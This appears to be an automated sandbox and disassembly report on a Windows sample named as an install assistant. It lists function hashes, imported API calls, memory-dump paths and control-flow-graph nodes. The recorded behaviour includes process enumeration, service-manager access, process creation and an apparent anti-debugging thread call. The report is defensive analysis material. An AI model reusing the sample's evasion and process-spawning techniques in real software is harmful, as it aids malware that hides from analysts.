• Opcode ID: 783133d33f1c24634eecbf6d23a0225591af883a513e144592e484fed0646056
• Instruction ID: d698d796cc9b6a984cb37a1cd0acbbb7bb5d283917afd2f141a542fcb7facc9a
• Opcode Fuzzy Hash: 783133d33f1c24634eecbf6d23a0225591af883a513e144592e484fed0646056
• Instruction Fuzzy Hash: 25741531644B028FC728CF28C9D0A95B7E3FF95318B198A6DC0A68BB55E774B54BCB50

Control-flow Graph
[control-flow graph image not reproduced; basic blocks 6c9698b0-6c96996c, calling FindFirstFileA and FindClose]
APIs
• FindFirstFileA.KERNEL32(?,?), ref: 6C9698CC
• FindClose.KERNEL32(000000FF), ref: 6C969949
Strings
Similarity
• API ID: Find$CloseFileFirst
• String ID: gF:E$hF:E$hF:E
• API String ID: 2295610775-4234190611
• Opcode ID: 380d92ee699a32462a56ae22175e4fde40c91d89463f2abd84a66f8f49f25b13
• Instruction ID: 3e0d21a4528d51e60ebdc2b20f3e40218cfe65b04958100feacd22f23aa5739d
• Opcode Fuzzy Hash: 380d92ee699a32462a56ae22175e4fde40c91d89463f2abd84a66f8f49f25b13
• Instruction Fuzzy Hash: CF116D781093429FDB158F29D444A5ABBF4BB85314F568E59F4A9C7AD1D330CD88CB12

Control-flow Graph
[control-flow graph image not reproduced; basic blocks 6c974050-6c9741d5, calling CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CloseHandle and internal routines 6c981a25, 6c97a740]
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C97405E
• CloseHandle.KERNEL32(?), ref: 6C9740EC
Similarity
• API ID: CloseCreateHandleSnapshotToolhelp32
• String ID:
• API String ID: 3280610774-0
• Opcode ID: 3ddcd6e3fb1ee48e48edc71fd448f9e0a26e1eaba21c09de457994f0232808f4
• Instruction ID: d71810e8850aa828068b4ff91c4a9b6163fcfc6c2c704d0a61926bba864ca14b
• Opcode Fuzzy Hash: 3ddcd6e3fb1ee48e48edc71fd448f9e0a26e1eaba21c09de457994f0232808f4
• Instruction Fuzzy Hash: CE315D7464A301DFD720DF68C88874ABBE8FB99314F104A19E498D37A1D335D954DF62

Control-flow Graph
[control-flow graph image not reproduced; basic blocks 6c7f383b-6c7f414b, calling GetCurrentThread, NtSetInformationThread and internal routines 6c9418a0, 6c9418b0, 6c7f3750]
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c29e6f392ab53eb9e0159fd8caf0e0f22635c032402afed3cc20a7a152a3b3ce
• Instruction ID: b67719d950401a58fc99ee16b22933ecefd0fb06a4f609bc03ef486b8ba4d58b
• Opcode Fuzzy Hash: c29e6f392ab53eb9e0159fd8caf0e0f22635c032402afed3cc20a7a152a3b3ce
• Instruction Fuzzy Hash: 3E32C032245B018FC324CF28C9D0696B7E3EF91314B698A6DC0BA4BB95D775B44BCB51
APIs
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 3f7f1cbd1905a7f4689991743278569ebbcec5b860ae881b138448018543e242
• Instruction ID: 99c878b90a6a655831c0bd6d1a438829c9d3871c96043a9a25053188d1728d8c
• Opcode Fuzzy Hash: 3f7f1cbd1905a7f4689991743278569ebbcec5b860ae881b138448018543e242
• Instruction Fuzzy Hash: 8851CE325547018BC320CF28C9C0785B7A3BFA5314F698B5DC0BA5BB95DB74B44B9B92
APIs
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 3de130bd4269549eedf86dd371ebc7b71527af04f7794acc8aacf9ed4e7d40db
• Instruction ID: 1e3b02b012cd2b6dda9865dc1f0d71eecfe43a5b0a4f8a6e8c58cc8e9e7ba451
• Opcode Fuzzy Hash: 3de130bd4269549eedf86dd371ebc7b71527af04f7794acc8aacf9ed4e7d40db
• Instruction Fuzzy Hash: BD51CC31504B018BC320CF28C5C0795B7A3BFA6354F698B5DC0BA5BB95DB70B44B9B92
APIs
• GetCurrentThread.KERNEL32 ref: 6C7F3E9D
• NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C7F3EAA
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CurrentInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 1650627709-0
                                                                                                                • Opcode ID: f29cb0efb1de1ca214b5db9753066778df22726c2b981dd2737f7c6d9cbe7915
                                                                                                                • Instruction ID: 7feda375c5fa61a3b39a235bc4ebe680defde933bbc1f468dba3e866262646c8
                                                                                                                • Opcode Fuzzy Hash: f29cb0efb1de1ca214b5db9753066778df22726c2b981dd2737f7c6d9cbe7915
                                                                                                                • Instruction Fuzzy Hash: CF310031655B01CBD320CF28C9D47C6B7A2BFA6314F298B5DC0B65BB81DB74700A9B62
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6C7F3E9D
                                                                                                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C7F3EAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CurrentInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 1650627709-0
                                                                                                                • Opcode ID: 4ea12702a7613f88d192317f40e74224859c5b0ccfd9e62c2910a151229a5db6
                                                                                                                • Instruction ID: c0e2fddb9ada5273df0f57d84f3d1ff5686d0bf48ac7ec8958f9203b05737e1c
                                                                                                                • Opcode Fuzzy Hash: 4ea12702a7613f88d192317f40e74224859c5b0ccfd9e62c2910a151229a5db6
                                                                                                                • Instruction Fuzzy Hash: D8310F31114701CBD724CF28C6D4796B7A2BFA2304F284A5CC0BA4BB82DB71B046DB92
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 6C7F3E9D
                                                                                                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C7F3EAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$CurrentInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 1650627709-0
                                                                                                                • Opcode ID: 5c2a7b6f1eba2c7d49cb479d98894b50bebcb8949150268e0fc5cece2a5f2184
                                                                                                                • Instruction ID: 5ff18cd03825bf68356b9e20417d3219a7c38c791974ccd0e5afb42ef5c18dfc
                                                                                                                • Opcode Fuzzy Hash: 5c2a7b6f1eba2c7d49cb479d98894b50bebcb8949150268e0fc5cece2a5f2184
                                                                                                                • Instruction Fuzzy Hash: C3212430118702CBD324CF24CAD479677B2BF52344F188B2DC0B68BB81DB74B0469B62
                                                                                                                APIs
                                                                                                                • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C973F40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1889721586-0
                                                                                                                • Opcode ID: 14a24c356ffa264b0b165b4219383f1c914cee6e7bfdf7e0dba62df4606fe32e
                                                                                                                • Instruction ID: 07abbcbda480d06650bda1fd9217cfd104e39264e7c6f8885c07bcc7cc6f88f5
                                                                                                                • Opcode Fuzzy Hash: 14a24c356ffa264b0b165b4219383f1c914cee6e7bfdf7e0dba62df4606fe32e
                                                                                                                • Instruction Fuzzy Hash: EA313674609342AFD711CF28C888A0ABBF5BF89794F14896EF488C7262C335D854CB63
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p
                                                                                                                • API String ID: 0-2001680094
                                                                                                                • Opcode ID: d360ad73146bf0c0d231e5a8b0deca56224d00aa79b634c5ae565214a31b4e02
                                                                                                                • Instruction ID: eb7cc68794c215e480a015da9439122806fc9086ddff5f51ebfb09f0e350bcd7
                                                                                                                • Opcode Fuzzy Hash: d360ad73146bf0c0d231e5a8b0deca56224d00aa79b634c5ae565214a31b4e02
                                                                                                                • Instruction Fuzzy Hash: D7A27BB460E3858FC724CE18C4906AEBBF2ABD9319F24CD2EE494C7755EA34D4468B53

                                                                                                                 Control-flow Graph (interactive graph rendering; node and edge listing not reproduced)
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 0-4022487301
                                                                                                                • Opcode ID: c00447a5c2888fb8dac0c2e2600b07906897e77cd5e026fe8a0c237e33cca6c6
                                                                                                                • Instruction ID: 4a93814016b46ed3c5ffd1ee811a05df7e4f08cda140eb09ad9692c395194d61
                                                                                                                • Opcode Fuzzy Hash: c00447a5c2888fb8dac0c2e2600b07906897e77cd5e026fe8a0c237e33cca6c6
                                                                                                                • Instruction Fuzzy Hash: 54C12674A062499FDF05CF99CC80BEDBBB4BF1A718F184858E424ABB81CB34D905CB61

                                                                                                                 Control-flow Graph (interactive graph rendering; node and edge listing not reproduced)
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6C993277: CreateFileW.KERNEL32(00000000,00000000,?,6C992F35,?,?,00000000,?,6C992F35,00000000,0000000C), ref: 6C993294
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C992FA0
                                                                                                                • __dosmaperr.LIBCMT ref: 6C992FA7
                                                                                                                • GetFileType.KERNEL32(00000000), ref: 6C992FB3
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C992FBD
                                                                                                                • __dosmaperr.LIBCMT ref: 6C992FC6
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6C992FE6
                                                                                                                • CloseHandle.KERNEL32(6C989EF0), ref: 6C993133
                                                                                                                • GetLastError.KERNEL32 ref: 6C993165
                                                                                                                • __dosmaperr.LIBCMT ref: 6C99316C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                 • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                 • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                • String ID: 8Q
                                                                                                                • API String ID: 4237864984-4022487301
                                                                                                                • Opcode ID: 25673e3ccc3b36967f10181c6fbf29bd5dff5fb24e75098ada06c9ee24dbce19
                                                                                                                • Instruction ID: 4f7b6c5a4e008131aa0973e3aa7bb04dc38f8453df9bf9f759886cf3d1732a3d
                                                                                                                • Opcode Fuzzy Hash: 25673e3ccc3b36967f10181c6fbf29bd5dff5fb24e75098ada06c9ee24dbce19
                                                                                                                • Instruction Fuzzy Hash: F4A13232A046559FCF198FB8C8807EE7BB4BB06328F18425DE815AF790CB35C916C762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4092 6c94b750-6c94b7c0 call 6c975990 call 6c97a740 4097 6c94b7e6-6c94b7ef 4092->4097 4098 6c94b850-6c94b855 4097->4098 4099 6c94b7f1-6c94b7f6 4097->4099 4100 6c94b950-6c94b955 4098->4100 4101 6c94b85b-6c94b860 4098->4101 4102 6c94b8b0-6c94b8b5 4099->4102 4103 6c94b7fc-6c94b801 4099->4103 4106 6c94ba75-6c94ba7a 4100->4106 4107 6c94b95b-6c94b960 4100->4107 4108 6c94b866-6c94b86b 4101->4108 4109 6c94b9dd-6c94b9e2 4101->4109 4110 6c94ba0e-6c94ba13 4102->4110 4111 6c94b8bb-6c94b8c0 4102->4111 4104 6c94b807-6c94b80c 4103->4104 4105 6c94b9ac-6c94b9b1 4103->4105 4112 6c94bab6-6c94babb 4104->4112 4113 6c94b812-6c94b817 4104->4113 4122 6c94b9b7-6c94b9bc 4105->4122 4123 6c94bbf1-6c94bbf6 4105->4123 4124 6c94ba80-6c94ba85 4106->4124 4125 6c94bcdb-6c94bce0 4106->4125 4118 6c94b966-6c94b96b 4107->4118 4119 6c94bb9a-6c94bb9f 4107->4119 4120 6c94b871-6c94b876 4108->4120 4121 6c94bafa-6c94baff 4108->4121 4114 6c94bc2c-6c94bc31 4109->4114 4115 6c94b9e8-6c94b9ed 4109->4115 4116 6c94bc79-6c94bc7e 4110->4116 4117 6c94ba19-6c94ba1e 4110->4117 4126 6c94b8c6-6c94b8cb 4111->4126 4127 6c94bb48-6c94bb4d 4111->4127 4144 6c94c026-6c94c04e 4112->4144 4145 6c94bac1-6c94bac6 4112->4145 4130 6c94bd16-6c94bd1b 4113->4130 4131 6c94b81d-6c94b822 4113->4131 4138 6c94bc37-6c94bc3c 4114->4138 4139 6c94c162-6c94c193 4114->4139 4128 6c94bf46-6c94bf81 call 6c97a740 call 6c94a500 4115->4128 4129 6c94b9f3-6c94b9f8 4115->4129 4142 6c94bc84-6c94bc89 4116->4142 4143 6c94c1c7-6c94c1f6 4116->4143 4134 6c94ba24-6c94ba29 4117->4134 4135 6c94bfab-6c94bfcb 4117->4135 4152 6c94b971-6c94b976 4118->4152 4153 6c94be2a-6c94be2f 4118->4153 4156 6c94bba5-6c94bbaa 4119->4156 4157 6c94c0e0-6c94c10c 4119->4157 4136 6c94bd43-6c94bd48 4120->4136 4137 6c94b87c-6c94b881 4120->4137 4150 6c94bb05-6c94bb0a 4121->4150 4151 6c94c082-6c94c099 4121->4151 4158 6c94b9c2-6c94b9c7 4122->4158 4159 6c94bebc-6c94bf24 4122->4159 4132 6c94bbfc-6c94bc01 4123->4132 4133 6c94c13d-6c94c15d 4123->4133 4140 6c94bff5-6c94c005 4124->4140 4141 6c94ba8b-6c94ba90 4124->4141 4148 6c94bce6-6c94bceb 4125->4148 4149 6c94c22e-6c94c23e 4125->4149 4146 6c94bda6-6c94bdab 4126->4146 4147 6c94b8d1-6c94b8d6 4126->4147 4154 6c94bb53-6c94bb58 4127->4154 4155 6c94bc9a-6c94bcd6 4127->4155 4229 6c94bf86-6c94bfa6 4128->4229 4184 6c94bdfd-6c94be25 4129->4184 4185 6c94b9fe-6c94ba03 4129->4185 4173 6c94bd21-6c94bd26 4130->4173 4174 6c94c262-6c94c286 4130->4174 4160 6c94bdd0-6c94bdf8 4131->4160 4161 6c94b828-6c94b82d 4131->4161 4132->4155 4162 6c94bc07-6c94bc0c 4132->4162 4133->4097 4186 6c94bfd0-6c94bff0 4134->4186 4187 6c94ba2f-6c94ba34 4134->4187 4135->4097 4175 6c94bd4e-6c94bd53 4136->4175 4176 6c94c28b-6c94c29b 4136->4176 4165 6c94b887-6c94b88c 4137->4165 4166 6c94b7c2-6c94b7d3 4137->4166 4163 6c94bc42-6c94bc47 4138->4163 4164 6c94c198-6c94c1c2 call 6c97a1c0 4138->4164 4139->4097 4190 6c94c00f-6c94c01c 4140->4190 4189 6c94ba96-6c94ba9b 4141->4189 4141->4190 4167 6c94bc8f-6c94bc94 4142->4167 4168 6c94c1fb-6c94c229 4142->4168 4143->4097 4195 6c94c054-6c94c05c 4144->4195 4191 6c94c061-6c94c07a 4145->4191 4192 6c94bacc-6c94bad1 4145->4192 4146->4160 4179 6c94bdad-6c94bdb2 4146->4179 4171 6c94be83-6c94be93 4147->4171 4172 6c94b8dc-6c94b8e1 4147->4172 4169 6c94bcf1-6c94bcf6 4148->4169 4170 6c94c248-6c94c258 4148->4170 4149->4170 4193 6c94bb10-6c94bb15 4150->4193 4194 6c94c0a3-6c94c0c3 4150->4194 4151->4194 4177 6c94b97c-6c94b981 4152->4177 4178 6c94be9d-6c94beb7 4152->4178 4182 6c94c2a5-6c94c2aa 4153->4182 4183 6c94be35-6c94be7e 4153->4183 4196 6c94bb5e-6c94bb63 4154->4196 4197 6c94c0c8-6c94c0d8 4154->4197 4155->4097 4198 6c94bbb0-6c94bbb5 4156->4198 4199 6c94c111-6c94c138 4156->4199 4157->4097 4180 6c94b9cd-6c94b9d2 4158->4180 4181 6c94bf29-6c94bf3e 4158->4181 4159->4097 4160->4097 4161->4097 4201 6c94b82f-6c94b841 4161->4201 4162->4097 4202 6c94bc12-6c94bc27 4162->4202 4163->4097 4204 6c94bc4d-6c94bc74 4163->4204 4164->4097 4165->4097 4203 6c94b892-6c94b89f 4165->4203 4220 6c94b7d8-6c94b7dd 4166->4220 4167->4097 4167->4155 4168->4097 4169->4097 4207 6c94bcfc-6c94bd11 4169->4207 4170->4174 4171->4178 4172->4097 4206 6c94b8e7-6c94b94a call 6c94c2c0 CreateFileA 4172->4206 4173->4097 4208 6c94bd2c-6c94bd39 4173->4208 4174->4097 4175->4097 4209 6c94bd59-6c94bda1 4175->4209 4176->4182 4177->4097 4210 6c94b987-6c94b9a7 4177->4210 4214 6c94b7e0-6c94b7e4 4178->4214 4179->4097 4211 6c94bdb8-6c94bdc8 4179->4211 4180->4184 4212 6c94b9d8 4180->4212 4181->4128 4182->4097 4205 6c94c2b0-6c94c2bb 4182->4205 4183->4214 4184->4097 4185->4160 4213 6c94ba09 4185->4213 4186->4097 4187->4097 4215 6c94ba3a-6c94ba70 4187->4215 4189->4097 4217 6c94baa1-6c94bab1 4189->4217 4190->4144 4191->4151 4192->4097 4218 6c94bad7-6c94baf1 4192->4218 4193->4097 4219 6c94bb1b-6c94bb43 4193->4219 4194->4097 4195->4097 4196->4097 4221 6c94bb69-6c94bb95 4196->4221 4197->4157 4198->4097 4222 6c94bbbb-6c94bbec call 6c9418a0 call 6c9418b0 4198->4222 4199->4097 4201->4214 4202->4097 4203->4220 4204->4097 4206->4097 4207->4097 4208->4136 4209->4097 4210->4195 4211->4160 4212->4097 4213->4097 4214->4097 4215->4097 4217->4214 4218->4121 4219->4097 4220->4214 4221->4097 4222->4097 4229->4097
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                                                                                                                • API String ID: 0-2932700092
                                                                                                                • Opcode ID: 9582e9c101f06cf333068a339fa3ee4a3e3f4cb510a3f4a69c95d3d07ffd387f
                                                                                                                • Instruction ID: d7e57fac3f83a8cbee03b9f1b1ee300b4cc76ef3d94a13dbe4a862b358425814
                                                                                                                • Opcode Fuzzy Hash: 9582e9c101f06cf333068a339fa3ee4a3e3f4cb510a3f4a69c95d3d07ffd387f
                                                                                                                • Instruction Fuzzy Hash: 0352217460D7829FCB14CE28C49062EBBF1AF8A714F248D5EE499CBB50D634D889CB53
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ;T55
                                                                                                                • API String ID: 0-2572755013
                                                                                                                • Opcode ID: f2b943859b3d7ca4c3799f898ba98b74db0a49a462e5902b58aa53dbd2420bb4
                                                                                                                • Instruction ID: b2709f413f4004ae6a5f8fbc4ff0ebd4a2339b218a33b939a016d6886457440b
                                                                                                                • Opcode Fuzzy Hash: f2b943859b3d7ca4c3799f898ba98b74db0a49a462e5902b58aa53dbd2420bb4
                                                                                                                • Instruction Fuzzy Hash: D103C031645B018FC738CF28C9D0696B7E2AFD5324B19CE6DC0AA4BB95DB74B44ACB50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4627 6c973e00-6c973e87 CreateProcessA 4628 6c973eab-6c973eb4 4627->4628 4629 6c973eb6-6c973ebb 4628->4629 4630 6c973ed0-6c973f1a WaitForSingleObject CloseHandle * 2 4628->4630 4631 6c973e90-6c973ea3 4629->4631 4632 6c973ebd-6c973ec2 4629->4632 4630->4628 4631->4628 4632->4628 4633 6c973ec4-6c973f27 4632->4633
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.1535124805.000000006C7F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.1535095993.000000006C7F0000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536340055.000000006C996000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1536416534.000000006C9A6000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537056317.000000006CA71000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537101593.000000006CA77000.00000020.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000C.00000002.1537854303.000000006CB5D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_6c7f0000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CreateObjectProcessSingleWait
                                                                                                                • String ID: D
                                                                                                                • API String ID: 2059082233-2746444292
                                                                                                                • Opcode ID: 43b9603db363da6e7c40c7a492400d45ac752fd94b9bc5e928da7c7aa1794006
                                                                                                                • Instruction ID: 8dfbdbc85a40f0ee7f278b43be12df7f9ca6bf2ca37a5ee33965d8494f74f1a0
                                                                                                                • Opcode Fuzzy Hash: 43b9603db363da6e7c40c7a492400d45ac752fd94b9bc5e928da7c7aa1794006
                                                                                                                • Instruction Fuzzy Hash: 8631EFB18193418FD710DF28C18876ABBF0BB89308F509A1DF8D986260E774D584CF43

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
